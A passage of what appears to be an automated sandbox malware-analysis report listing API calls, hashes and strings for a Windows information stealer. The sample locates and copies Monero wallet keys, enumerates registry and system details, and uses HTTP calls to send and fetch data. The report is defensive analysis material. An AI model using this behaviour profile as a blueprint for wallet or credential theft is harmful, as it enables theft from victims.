                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: lstrcat$lstrcpylstrlen$FileHeapmemset$AllocAllocateCopyDeleteLocalProcessmemcmp
                                                                                                      • String ID:
                                                                                                      • API String ID: 2228671196-0
                                                                                                      • Opcode ID: 7e379cea82dbd82070d166ba97bbe28dc3ceb3c8b6954320ffdeae1ebf685c7b
                                                                                                      • Instruction ID: c7be15c6cc4abab23e8f274795eadccbdda502ec8511485448b77053ecd04baf
                                                                                                      • Opcode Fuzzy Hash: 7e379cea82dbd82070d166ba97bbe28dc3ceb3c8b6954320ffdeae1ebf685c7b
                                                                                                      • Instruction Fuzzy Hash: B0029475900208ABCB14EBA1DC96EEE773ABF14305F11415EF507B6091DF38AE85CBA9
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                        • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                        • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                        • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                        • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                        • Part of subcall function 00415260: GetSystemTime.KERNEL32(?,02D91B90,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286
                                                                                                        • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                        • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040C6D3
                                                                                                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040C817
                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 0040C81E
                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0040C958
                                                                                                      • lstrcat.KERNEL32(?,0041DBD8), ref: 0040C967
                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0040C97A
                                                                                                      • lstrcat.KERNEL32(?,0041DBDC), ref: 0040C989
                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0040C99C
                                                                                                      • lstrcat.KERNEL32(?,0041DBE0), ref: 0040C9AB
                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0040C9BE
                                                                                                      • lstrcat.KERNEL32(?,0041DBE4), ref: 0040C9CD
                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0040C9E0
                                                                                                      • lstrcat.KERNEL32(?,0041DBE8), ref: 0040C9EF
                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0040CA02
                                                                                                      • lstrcat.KERNEL32(?,0041DBEC), ref: 0040CA11
                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0040CA24
                                                                                                      • lstrcat.KERNEL32(?,0041DBF0), ref: 0040CA33
                                                                                                        • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,02DBD9C8,?,0041D8AC,?,00000000), ref: 00416E2B
                                                                                                        • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
                                                                                                      • lstrlen.KERNEL32(?), ref: 0040CA7A
                                                                                                      • lstrlen.KERNEL32(?), ref: 0040CA89
                                                                                                      • memset.MSVCRT ref: 0040CAD2
                                                                                                        • Part of subcall function 00417070: StrCmpCA.SHLWAPI(00000000,0041DBD0,0040C8F2,0041DBD0,00000000), ref: 0041708F
                                                                                                      • DeleteFileA.KERNEL32(00000000), ref: 0040CAFE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
                                                                                                      • String ID:
                                                                                                      • API String ID: 1973479514-0
                                                                                                      • Opcode ID: 32ba6412fb565d8a1011b08ec77e67a79d3f7f1a06a611df1434b1d0c67e7452
                                                                                                      • Instruction ID: d19a215fe10c8d685073d70632a82ede6d900fe39af11de2b9913f634a463049
                                                                                                      • Opcode Fuzzy Hash: 32ba6412fb565d8a1011b08ec77e67a79d3f7f1a06a611df1434b1d0c67e7452
                                                                                                      • Instruction Fuzzy Hash: B1E15275910208ABCB14EBA1DD96EEE773ABF14305F11415EF107B6091DF38AE85CBA8
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      control_flow_graph 1432 404540-404602 call 416da0 call 404470 call 416d40 * 5 InternetOpenA StrCmpCA 1447 404604 1432->1447 1448 40460b-40460f 1432->1448 1447->1448 1449 404615-40478d call 415260 call 416f20 call 416ea0 call 416e00 * 2 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416f20 call 416ea0 call 416e00 * 2 InternetConnectA 1448->1449 1450 404b8b-404bb3 InternetCloseHandle call 4170d0 call 4094a0 1448->1450 1449->1450 1536 404793-404797 1449->1536 1460 404bf2-404c62 call 415070 * 2 call 416da0 call 416e00 * 8 1450->1460 1461 404bb5-404bed call 416e20 call 416fb0 call 416ea0 call 416e00 1450->1461 1461->1460 1537 4047a5 1536->1537 1538 404799-4047a3 1536->1538 1539 4047af-4047e2 HttpOpenRequestA 1537->1539 1538->1539 1540 4047e8-404ae8 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416d40 call 416f20 * 2 call 416ea0 call 416e00 * 2 call 4170d0 lstrlen call 4170d0 * 2 lstrlen call 4170d0 HttpSendRequestA 1539->1540 1541 404b7e-404b85 InternetCloseHandle 1539->1541 1652 404af2-404b1c InternetReadFile 1540->1652 1541->1450 1653 404b27-404b79 InternetCloseHandle call 416e00 1652->1653 1654 404b1e-404b25 1652->1654 1653->1541 1654->1653 1655 404b29-404b67 call 416fb0 call 416ea0 call 416e00 1654->1655 1655->1652
                                                                                                      APIs
                                                                                                        • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                        • Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
                                                                                                        • Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506
                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004045D5
                                                                                                      • StrCmpCA.SHLWAPI(?,02DD4F80), ref: 004045FA
                                                                                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040477A
                                                                                                      • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,0041D797,00000000,?,?,00000000,?,",00000000,?,02DD5140), ref: 00404AA8
                                                                                                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00404AC4
                                                                                                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404AD8
                                                                                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404B09
                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00404B6D
                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00404B85
                                                                                                      • HttpOpenRequestA.WININET(00000000,02DD5050,?,02DD9608,00000000,00000000,00400100,00000000), ref: 004047D5
                                                                                                        • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                        • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                        • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                        • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                        • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                        • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00404B8F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                                                                                      • String ID: "$"$------$------$------
                                                                                                      • API String ID: 460715078-2180234286
                                                                                                      • Opcode ID: f33dea5127848ba384777a4dbc49c04e97c3bf8f4462a4ed0d356fd91c921632
                                                                                                      • Instruction ID: e2fbf7176fc7eb33215a1d8fdd4a82cafc16ed7ff926df7fa74fdc4e30892001
                                                                                                      • Opcode Fuzzy Hash: f33dea5127848ba384777a4dbc49c04e97c3bf8f4462a4ed0d356fd91c921632
                                                                                                      • Instruction Fuzzy Hash: F21252769102189ACB14EB91DC92FDEB739AF54308F51419EF10672491DF38AF89CF68
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                      • RegOpenKeyExA.KERNEL32(00000000,02DD5B60,00000000,00020019,00000000,0041D289), ref: 00414B41
                                                                                                      • RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414BC3
                                                                                                      • wsprintfA.USER32 ref: 00414BF6
                                                                                                      • RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00414C18
                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00414C29
                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00414C36
                                                                                                        • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CloseOpenlstrcpy$Enumwsprintf
                                                                                                      • String ID: - $%s\%s$?
                                                                                                      • API String ID: 3246050789-3278919252
                                                                                                      • Opcode ID: 930de5723faa0400951dee4f27910df841fdc16a3a940316e07c619471dc291e
                                                                                                      • Instruction ID: fbc8112ab3bfbfb2fdc98052a2813d45c496b4d84dbcb1503bfdf8522ef193f5
                                                                                                      • Opcode Fuzzy Hash: 930de5723faa0400951dee4f27910df841fdc16a3a940316e07c619471dc291e
                                                                                                      • Instruction Fuzzy Hash: F1712A7590021C9BDB64DB60DD91FDA77B9BF88304F0086D9A109A6180DF74AFCACF94
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • strtok_s.MSVCRT ref: 0040F667
                                                                                                      • strtok_s.MSVCRT ref: 0040FA8F
                                                                                                        • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,02DBD9C8,?,0041D8AC,?,00000000), ref: 00416E2B
                                                                                                        • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: strtok_s$lstrcpylstrlen
                                                                                                      • String ID:
                                                                                                      • API String ID: 348468850-0
                                                                                                      • Opcode ID: a4fd3b02248a231e93288822094748fbdcfe7038c27ec4d2a69c7b1c07e2e100
                                                                                                      • Instruction ID: 2b3dd8003c7db60ae6f20250f168b485c10b0cdbdb2f80ad8031a0e3e82ebbeb
                                                                                                      • Opcode Fuzzy Hash: a4fd3b02248a231e93288822094748fbdcfe7038c27ec4d2a69c7b1c07e2e100
                                                                                                      • Instruction Fuzzy Hash: B4C1A7B5900619DBCB24EF60DC89FDA7779AF58304F00459EE40DA7191DB34AAC9CFA8
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 004012E7
                                                                                                        • Part of subcall function 00401260: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 00401274
                                                                                                        • Part of subcall function 00401260: HeapAlloc.KERNEL32(00000000), ref: 0040127B
                                                                                                        • Part of subcall function 00401260: RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 00401297
                                                                                                        • Part of subcall function 00401260: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012B5
                                                                                                        • Part of subcall function 00401260: RegCloseKey.ADVAPI32(?), ref: 004012BF
                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0040130F
                                                                                                      • lstrlen.KERNEL32(?), ref: 0040131C
                                                                                                      • lstrcat.KERNEL32(?,.keys), ref: 00401337
                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                        • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                        • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                        • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                        • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                        • Part of subcall function 00415260: GetSystemTime.KERNEL32(?,02D91B90,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286
                                                                                                        • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                        • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                      • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401425
                                                                                                        • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                        • Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
                                                                                                        • Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
                                                                                                        • Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
                                                                                                        • Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
                                                                                                        • Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
                                                                                                        • Part of subcall function 004093A0: CloseHandle.KERNEL32(000000FF), ref: 0040947A
                                                                                                      • DeleteFileA.KERNEL32(00000000), ref: 004014A9
                                                                                                      • memset.MSVCRT ref: 004014D0
                                                                                                        • Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                        • Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                        • Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,02DD4F80), ref: 00404ED9
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Filelstrcpy$lstrcat$lstrlen$AllocCloseHeapLocalOpenmemset$CopyCreateDeleteFreeHandleInternetProcessQueryReadSizeSystemTimeValue
                                                                                                      • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                                                                                      • API String ID: 330749937-218353709
                                                                                                      • Opcode ID: aac4f7d6eec6ac4db1ee9e0695c0bfe35040fa64cf83d77a6c1a2760d22fd09b
                                                                                                      • Instruction ID: 465d6e3be360dc7981781b6de12631b9db2cd28431e3bfe2701297f35846b4c8
                                                                                                      • Opcode Fuzzy Hash: aac4f7d6eec6ac4db1ee9e0695c0bfe35040fa64cf83d77a6c1a2760d22fd09b
                                                                                                      • Instruction Fuzzy Hash: DD5123B195021897CB15EB61DD92BED773D9F54304F4041EDB60A62091DE385BC5CFA8
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004141DF
                                                                                                      • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041421C
                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004142A0
                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 004142A7
                                                                                                      • wsprintfA.USER32 ref: 004142DD
                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                                                                                      • String ID: :$C$\
                                                                                                      • API String ID: 3790021787-3809124531
                                                                                                      • Opcode ID: 77a074fb3b9fb54d8c60e731bc2f7662655a64108544cd173689164fc73fd892
                                                                                                      • Instruction ID: 52054a8b39965f6583c41ffabf349f0ba0ed2356e3a02770a6039194ee1378f4
                                                                                                      • Opcode Fuzzy Hash: 77a074fb3b9fb54d8c60e731bc2f7662655a64108544cd173689164fc73fd892
                                                                                                      • Instruction Fuzzy Hash: BA3194B0D00258EBDF20DFA4DC45BEE77B4AF48304F104099F5496B281DB78AAD5CB95
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
                                                                                                      • GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
                                                                                                      • LocalAlloc.KERNEL32(00000040,?), ref: 00409411
                                                                                                      • ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
                                                                                                      • LocalFree.KERNEL32('@), ref: 00409470
                                                                                                      • CloseHandle.KERNEL32(000000FF), ref: 0040947A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                                                                      • String ID: '@$'@
                                                                                                      • API String ID: 2311089104-345573653
                                                                                                      • Opcode ID: fd5dbe8c05bbcabb50c9e0c438e92dd2d28f417a834b94666c3240b3ece9347a
                                                                                                      • Instruction ID: e17ca2bf8fb39da35cf654cfb04ed30359ebe63801e33f8f777122e55a65d6c5
                                                                                                      • Opcode Fuzzy Hash: fd5dbe8c05bbcabb50c9e0c438e92dd2d28f417a834b94666c3240b3ece9347a
                                                                                                      • Instruction Fuzzy Hash: 0B31EA74A00209EFDB24DF94C885BAEB7B5BF48314F108169E915A73D0D778AD42CFA5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,02DD7F90,00000000,?,0041D774,00000000,?,00000000,00000000,?,02DD81E8), ref: 0041496D
                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00414974
                                                                                                      • GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00414995
                                                                                                      • __aulldiv.LIBCMT ref: 004149AF
                                                                                                      • __aulldiv.LIBCMT ref: 004149BD
                                                                                                      • wsprintfA.USER32 ref: 004149E9
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Similarity
                                                                                                      • API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
                                                                                                      • String ID: %d MB$@
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                        • Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
                                                                                                        • Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506
                                                                                                      • InternetOpenA.WININET(0041D7D3,00000001,00000000,00000000,00000000), ref: 00405DAF
                                                                                                      • StrCmpCA.SHLWAPI(?,02DD4F80), ref: 00405DE7
                                                                                                      • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00405E2F
                                                                                                      • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00405E53
                                                                                                      • InternetReadFile.WININET(00410E73,?,00000400,?), ref: 00405E7C
                                                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00405EAA
                                                                                                      • CloseHandle.KERNEL32(?,?,00000400), ref: 00405EE9
                                                                                                      • InternetCloseHandle.WININET(00410E73), ref: 00405EF3
                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00405F00
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Similarity
                                                                                                      • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                                                                      • String ID:
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                        • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                        • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                        • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                        • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                        • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                        • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                        • Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
                                                                                                        • Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
                                                                                                        • Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E
                                                                                                      • lstrlen.KERNEL32(00000000), ref: 0040B44D
                                                                                                        • Part of subcall function 00415530: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552
                                                                                                      • StrStrA.SHLWAPI(00000000,AccountId), ref: 0040B47B
                                                                                                      • lstrlen.KERNEL32(00000000), ref: 0040B553
                                                                                                      • lstrlen.KERNEL32(00000000), ref: 0040B567
